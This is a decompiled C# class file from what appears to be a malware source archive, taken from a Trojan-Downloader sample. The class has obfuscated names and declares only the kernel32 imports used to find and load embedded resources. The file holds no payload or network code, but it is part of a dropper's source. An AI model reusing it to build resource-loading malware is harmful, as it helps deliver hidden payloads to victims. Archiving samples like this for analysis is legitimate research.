MalwareSourceCode/MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/Rjk3ibeceopw5x00uimwa5h2w/ch2futx3h3zpmhyzsblwlfrdktcnf3voh.cs
2022-08-18 06:28:56 -05:00

30 lines
1.2 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Rjk3ibeceopw5x00uimwa5h2w.ch2futx3h3zpmhyzsblwlfrdktcnf3voh
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
using System.Runtime.InteropServices;
namespace Rjk3ibeceopw5x00uimwa5h2w
{
public class ch2futx3h3zpmhyzsblwlfrdktcnf3voh
{
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr Pnqgzzjk5f0hyikci(string lpModuleName);
[DllImport("kernel32.dll", EntryPoint = "FindResourceA")]
public static extern IntPtr Ffz3mpnfyg4clsrkfrhqubycp(
IntPtr hModule,
int lpID,
string lpType);
[DllImport("kernel32.dll", EntryPoint = "LoadResource", SetLastError = true)]
public static extern IntPtr yeyqpjvohzgayjchvjm2bzdvn(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll", EntryPoint = "SizeofResource", SetLastError = true)]
public static extern uint Ncmhhqqsfk5fqfa4eo2qymkyp(IntPtr hModule, IntPtr hResInfo);
}
}